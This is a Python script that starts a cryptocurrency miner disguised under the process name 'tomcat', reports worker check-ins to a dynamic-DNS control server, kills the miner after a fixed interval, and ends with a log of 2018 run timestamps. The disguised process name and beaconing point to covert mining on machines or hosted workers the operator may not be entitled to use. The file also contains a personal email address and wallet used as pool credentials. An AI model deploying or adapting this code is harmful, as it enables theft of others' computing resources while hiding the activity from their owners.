import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:06.622788
#2018-02-17 17:28:04.158802
#2018-02-17 19:16:06.015989
#2018-02-17 21:07:02.125608
#2018-02-17 22:50:06.995326
#2018-02-18 00:35:06.157750
#2018-02-18 02:25:06.816214
#2018-02-18 04:12:05.954122
#2018-02-18 06:04:01.900320
#2018-02-18 07:55:06.630400
#2018-02-18 09:42:04.975766
#2018-02-18 11:27:04.787094
#2018-02-18 13:13:01.897624
#2018-02-18 15:02:07.067661
#2018-02-18 16:50:03.516392
#2018-02-18 18:38:04.515283
#2018-02-18 20:26:04.046565
#2018-02-18 22:12:04.393102
#2018-02-19 00:01:06.484025
#2018-02-19 01:46:06.203272
#2018-02-19 03:34:07.339111
#2018-02-19 05:19:06.455358
#2018-02-19 07:06:04.251706
#2018-02-19 08:54:07.410853
#2018-02-19 10:44:06.873053
#2018-02-19 12:32:06.585000
#2018-02-19 14:21:05.407364
#2018-02-19 16:11:08.008041
#2018-02-19 17:59:06.119655
#2018-02-19 19:46:03.831566
#2018-02-19 21:34:06.722539
#2018-02-19 23:21:05.304479
#2018-02-20 01:07:06.021047
#2018-02-20 02:56:06.662932
#2018-02-20 04:45:09.285062
#2018-02-20 06:29:07.448162
#2018-02-20 08:14:05.974065
#2018-02-20 09:59:06.320025
#2018-02-20 11:45:11.691470
#2018-02-20 13:35:08.234889
#2018-02-20 15:18:06.613559
#2018-02-20 17:05:03.038189
#2018-02-20 18:54:05.261764
#2018-02-20 20:45:11.710062
#2018-02-20 22:29:06.683841
#2018-02-21 00:10:03.009047
#2018-02-21 01:56:01.463247
#2018-02-21 03:46:01.245810
#2018-02-21 05:35:08.837518
#2018-02-21 07:24:21.693478
#2018-02-21 09:09:07.747639
#2018-02-21 10:57:10.578980
#2018-02-21 12:44:10.661286
#2018-02-21 14:32:07.434919
#2018-02-21 16:19:01.463309
#2018-02-21 18:09:01.700866
#2018-02-21 19:56:08.224014
#2018-02-21 21:44:01.498993
#2018-02-21 23:33:04.302763
#2018-02-22 01:21:01.503026
#2018-02-22 03:09:06.145391
#2018-02-22 04:56:05.091429
#2018-02-22 06:41:07.870481
#2018-02-22 08:29:07.856797
#2018-02-22 10:16:07.579006
#2018-02-22 12:01:08.741881
#2018-02-22 13:47:10.606789
#2018-02-22 15:35:10.236664
#2018-02-22 17:22:06.571597
#2018-02-22 19:09:07.107808
#2018-02-22 21:02:03.837372
#2018-02-22 22:46:06.280962
#2018-02-23 00:33:04.810951
#2018-02-23 02:20:04.691644
#2018-02-23 04:08:06.090988
#2018-02-23 05:54:04.126637
#2018-02-23 07:43:07.339970
#2018-02-23 09:47:01.440658
#2018-02-23 11:53:04.526670
#2018-02-23 13:42:07.348750
#2018-02-23 15:31:01.692507
#2018-02-23 17:20:07.417621
#2018-02-23 19:04:09.216663
#2018-02-23 20:50:11.352582
#2018-02-23 22:39:03.744574
#2018-02-24 00:26:03.856880
#2018-02-24 02:17:06.683419
#2018-02-24 04:08:04.105844
#2018-02-24 05:56:05.107243
#2018-02-24 07:43:06.947083
#2018-02-24 09:29:05.797468
#2018-02-24 11:24:06.020890
#2018-02-24 13:13:06.978774
#2018-02-24 15:04:01.305838
#2018-02-24 16:53:03.999053
#2018-02-24 18:42:01.484460
#2018-02-24 20:33:06.667881
#2018-02-24 22:35:01.392864
#2018-02-25 01:42:08.122086
#2018-02-25 04:31:04.309907
#2018-02-25 08:06:04.880259